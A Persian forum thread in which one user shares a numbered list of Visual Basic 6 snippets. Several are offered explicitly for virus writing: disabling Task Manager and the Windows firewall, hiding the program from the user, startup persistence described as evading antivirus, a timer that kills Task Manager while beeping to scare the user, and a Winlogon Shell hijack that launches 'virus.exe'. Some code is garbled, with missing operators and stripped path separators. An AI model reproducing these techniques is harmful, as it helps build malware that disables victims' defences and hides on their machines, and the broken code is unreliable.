• مجموعه ای از بهترین کد های بدرد بخور ویژوال بیسیک
  #1
  Note 
  با سلام امروز می خوام مجموعه ای از کد های بد خور رو بزارم که تو وب زیاد هستند ولی همشون یک جا نیستن

  امیدورام خوشتون بیاد:iran flag:

  1. گذشتن از روی خطا که خیلی راحت است
  کد php:
  On Error Resume Next 

  توضیح : این کد باعث می شه اگه در اجرای برنامه با مشکل برخورد برنامه متوفق نشه و به دستور بعدی بره (برای تازه کار ها)

  2.غیر فعال کردن تسک منیجر ویندوز xp (بیشتر برای ویروس نویسی)

  کد php:
  Shell "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"vbNormalFocus 
  اگر در این کد 1 را به 0 تغییر بدید تسک منیجر فعال می شه


  بقیه کد ها رو در پست های بعدی

  آخرین ویرایش: 04-07-2012 ساعت 14:49، توسط hamedre81
  شاید این جمعه بیاید
  پاسخ
  #2
  Note 
  3.گذاشتن شرط برای وجود یک فایل و تشخیص درایو ویندوز

  کد php:
  Environ("windir")
  If 
  Dir("\explorer.EXE") = vbNullString Then
   MsgBox 
  "not found"
  Else
   
  MsgBox "Found"
  End If 

  توضیح"
  a = Environ("windir") برای تشخیص درایو ویندوز گذاشتن این کد مقدار c:\windows را بر می گرداند در صورتی که ویندوز شما در درایو c نضب شده باشد

  شرط وجود یک فایل هم که معلوم هست  4.غیر فعال کردن فایروال ویندوز xp

  کد php:
  Shell "netsh firewall set opmode disable"vbHide 

  برای فعال کردن از کد زیر استفاده می کنن

  کد php:
  netsh firewall set opmode enable 

  بقیه کد ها در پست بعدی

  آخرین ویرایش: 04-07-2012 ساعت 09:50، توسط hamedre81
  شاید این جمعه بیاید
  پاسخ
  #3
  Note 
  5. بستن برنامه ای درحال اجرا

  کد php:
  Shell "taskkill /f /im " "expl.exe"vbHide 

  6.پنهان کردن فرم از دید کاربر و تسک منیجر
  کد php:
  me.hide
  App
  .TaskVisible False 


  بقیه کد ها در پست بعدی

  آخرین ویرایش: 04-07-2012 ساعت 09:52، توسط hamedre81
  شاید این جمعه بیاید
  پاسخ
  #4
  Note 
  7.قرار دادن برنامه در استارت آپ

  من ایجا 2 روش رو می گم :

  1.

  کد زیر را در ماژول بگذارید
  کد php:
  Public Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" (ByVal _
     hKey 
  As LongByVal lpSubKey As StringByVal ulOptions As LongByVal samDesired As LongphkResult As Long) As Long

  Public Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long

  Public Declare Function RegSetValueEx Lib "advapi32.dll" _
     Alias 
  "RegSetValueExA" (ByVal hKey As LongByVal lpValueName _
     
  As StringByVal Reserved As LongByVal dwType As Long_
     lpData 
  As AnyByVal cbData As Long) As Long

  Public Const HKEY_CURRENT_USER = &H80000001
  Public Const KEY_WRITE = &H20006
  Public Const REG_SZ 

  بعد کد زیر در فرم بزارید

  کد php:
  Dim hregkey As Long
     Dim subkey 
  As String
     Dim stringbuffer 
  As String

     subkey 
  "Software\Microsoft\Windows\CurrentVersion\Run"

     
  retval RegOpenKeyEx(HKEY_CURRENT_USERsubkey0KEY_WRITEhregkey)
     If 
  retval <> 0 Then
        Debug
  .Print "Can't open the subkey"
        
  Exit Sub
     End 
  If
     
  stringbuffer App.Path "\" & App.EXEName & ".exe" & vbNullChar
     retval = RegSetValueEx(hregkey, "
  My App", 0, REG_SZ, ByVal stringbuffer, Len(stringbuffer))

     RegCloseKey hregkey 

  در بیشتر آنتی ویروس ها این کد رو به عنوان ویروس تشخیص می ده

  اما روش دوم

  کد برای انداختن برنامه از آدرسی دیگر

  کد php:
  Set reg CreateObject("wscript.shell")
  reg.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" & "a", "H:\book1.exe"
  Set reg = Nothing 

  بجای H:\book1.exe باید آدرس برنامه تون رو بدید
  این کد هم توسط ویروس یاب تشخیص داده نمی شه


  8. کد ترساندن و اعصاب خود کن
  این کد طوری هست که اگر کاربر تسک منیجر ویندوز رو باز کنه صدای بیب داخل کیس شروع به زدن می کنه و کابر رو می ترسونه

  اسن کد رو در ماژول کپی کنید

  کد php:
  Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As StringByVal lpWindowName As String) As Long
  Private Declare Function SetForegroundWindow Lib "user32" (ByVal hWnd As Long) As Long
  Private Declare Function Beep Lib "kernel32" (ByVal dwFreq As LongByVal dwDuration As Long) As Long 

  اول یک تایمر درست کنید و مقدار linterval رو برابر با 1 قرار دهید . کد زیر را درونش بزارید

  کد php:
  handel FindWindow(vbNullString"Windows Task Manager")
  If 
  handel <> 0 Then
  Beep 135
  3304
  SetForegroundWindow handel
  SendKeys 
  "%{f4}"1
  End 
  If 

  آخرین ویرایش: 04-07-2012 ساعت 14:57، توسط hamedre81
  شاید این جمعه بیاید
  پاسخ
  #5
  Note 
  9.Disconnect کردن

  کد زیر در یک ماژول قرار دهید

  کد php:
  Public Const RAS_MAXENTRYNAME As Integer 256
  Public Const RAS_MAXDEVICETYPE As Integer 16
  Public Const RAS_MAXDEVICENAME As Integer 128
  Public Const RAS_RASCONNSIZE As Integer 412

  Public Type RasEntryName
    dwSize 
  As Long
    szEntryName
  (RAS_MAXENTRYNAME) As Byte
  End Type

  Public Type RasConn
    dwSize 
  As Long
    hRasConn 
  As Long
    szEntryName
  (RAS_MAXENTRYNAME) As Byte
    szDeviceType
  (RAS_MAXDEVICETYPE) As Byte
    szDeviceName
  (RAS_MAXDEVICENAME) As Byte
  End Type

  Public Declare Function RasEnumConnections Lib _
  "rasapi32.dll" Alias "RasEnumConnectionsA" (lpRasConn As _
  Any
  lpcb As LonglpcConnections As Long) As Long

  Public Declare Function RasHangUp Lib "rasapi32.dll" Alias _
  "RasHangUpA" (ByVal hRasConn As Long) As Long

  Public gstrISPName As String
  Public ReturnCode As Long

  Public Sub HangUp()
  Dim i As Long
  Dim lpRasConn
  (255) As RasConn
  Dim lpcb 
  As Long
  Dim lpcConnections 
  As Long
  Dim hRasConn 
  As Long
  lpRasConn
  (0).dwSize RAS_RASCONNSIZE
  lpcb 
  RAS_MAXENTRYNAME lpRasConn(0).dwSize
  lpcConnections 
  0
  ReturnCode 
  RasEnumConnections(lpRasConn(0), lpcb_
  lpcConnections
  )

  If 
  ReturnCode ERROR_SUCCESS Then
    
  For 0 To lpcConnections 1
    
  If Trim(ByteToString(lpRasConn(i).szEntryName)) _
    
  Trim(gstrISPNameThen
      hRasConn 
  lpRasConn(i).hRasConn
      ReturnCode 
  RasHangUp(ByVal hRasConn)
    
  End If
    
  Next i
  End 
  If

  End Sub

  Public Function ByteToString(bytString() As Byte) As String
  Dim i 
  As Integer
  ByteToString 
  ""
  0
  While bytString(i) = 0&
  ByteToString ByteToString Chr(bytString(i))
  1
  Wend
  End 
  Function 

  سپس کد زیر رو در یک دکمه قرار دهید

  کد php:
  HangUp 

  10.اجرا برنامه در سیف مد ( مخصصوص کسانی که قصد درست کردن ویروس دران)

  مثلا ویروسی می نویسید که در درایو c کپی بشه ، بعد باید به ویروس خود دستورات زیر را اضافه کنید :
  کد php:
  Set fso CreateObject("scripting.filesystemobject")
  file App.Path "\" & App.EXEName & ".exe"
  FileCopy file, "
  c:start up.exe"
  file2 = "
  c:start up.exe"
  Set Reg = CreateObject("
  wscript.shell")
  Reg.regwrite "
  HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonShell","Explorer.exe c:virus.exe
  تذکر خیلی مهم:فاصله ی بین explorer.exe و c:\virus.exe باید حتما وجود داشته باشه !

  شاید این جمعه بیاید
  پاسخ
  #6
  Note 
  11.میانبر درست کردن از برنامه مورد نظر

  کد php:
  Private Sub Form_Load()
     
  Create_ShortCut "آدرس برنامه""محل ذخیره میانبر""اسم میانبر", , 71
  End Sub
  Sub Create_ShortCut
  (ByVal TargetPath As StringByVal ShortCutPath As StringByVal ShortCutname As StringOptional ByVal WorkPath As StringOptional ByVal Window_Style As IntegerOptional ByVal IconNum As Integer)
      
  Dim VbsObj As Object
  Set VbsObj 
  CreateObject("WScript.Shell")
      
  Dim MyShortcut As Object
      Set MyShortcut 
  VbsObj.CreateShortcut(ShortCutPath "\" & ShortCutname & ".lnk") '"
      
  MyShortcut.TargetPath TargetPath
      MyShortcut
  .WorkingDirectory WorkPath
      MyShortcut
  .WindowStyle Window_Style
      MyShortcut
  .IconLocation TargetPath "," IconNum
      MyShortcut
  .Save
  End Sub 

  12.حذف پوشه

  کد زیر رو در قسمت جنرال کپی کنید

  کد php:
  Public Sub DelAll(ByVal DirtoDelete As Variant)

      
  Dim FSOFS
      Set FSO 
  CreateObject("Scripting.FileSystemObject")
      
  FS FSO.DeleteFolder(DirtoDeleteTrue)


  End Sub 

  بعد کد زیر رو در هر جای که خواستید بزارید(دکمه ,قرم)

  کد php:
  Call DelAll("G:\New Folder"

  شاید این جمعه بیاید
  پاسخ
  #7
  Note 
  13. باز و بستن درب CD ROM

  اگر ميخواهيد توسط برنامه خود درب CD ROM را باز و بسته كنيد كافيست ابتدا كد زير را در يك ماژول كپي كنيد.

  کد php:
  Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As StringByVal lpstrReturnString As StringByVal uReturnLength As LongByVal hwndCallback As Long) As Long 

  حالا كد زير را در پنجره فرم كپي كنيد.دو دكمه فرمان هم لازم است.
  کد php:
  Private Sub CMDOPEN_Click ()
  mciSendString "Set CDAudio Door Open Wait"0&, 0&, &
  End Sub

  Private Sub CMDCLOSE_Click ()
  mciSendString "Set CDAudio Door Closed Wait"0&, 0&, &
  End Sub 


  14.

  شاید این جمعه بیاید
  پاسخ
  ایجاد موضوع جدید   پاسخ به موضوع  

  موضوعات مرتبط با این موضوع...
  موضوع نویسنده پاسخ بازدید آخرین ارسال
  Note دانلود نمونه سولات ویژوال بیسیک SOFTAFZAR 1 2,637 18-12-2015 ساعت 11:30
  آخرین ارسال: majidvajih
  Note ماشین حساب پیشرفته به زبان ویژوال بیسیک SOFTAFZAR 2 4,841 28-01-2015 ساعت 16:36
  آخرین ارسال: xMAN
  Note space در ویژوال بیسیک 6 شهره 1 824 04-10-2014 ساعت 10:42
  آخرین ارسال: Comodo
  Note ویژوال بیسیک amir7519 1 771 19-07-2014 ساعت 17:36
  آخرین ارسال: C0der
  Note باز و بستن برنامه ها با ویژوال بیسیک Somi 1 840 18-05-2014 ساعت 19:28
  آخرین ارسال: VBProgrammer
  Note ایجاد لوزی با ویژوال بیسیک 6 Nastaran 2 925 07-04-2014 ساعت 14:25
  آخرین ارسال: Nastaran
  Note کمک در Sendkey ویژوال بیسیک THE KNIGHT 11 2,977 29-03-2014 ساعت 09:44
  آخرین ارسال: Stack OverFlow
  Note دانلود مجموعه پروژه ویژوال بیسیک Daniel 0 797 14-03-2014 ساعت 22:37
  آخرین ارسال: Daniel
  Note تمرینات حل شده درس برنامه سازی(ویژوال بیسیک) Daniel 0 1,390 13-03-2014 ساعت 19:32
  آخرین ارسال: Daniel
  Note دانلود 105 پروژه ویژوال بیسیک SOFTAFZAR 6 5,216 23-02-2014 ساعت 18:21
  آخرین ارسال: Daniel

  کاربرانِ درحال بازدید از این موضوع:   1 مهمان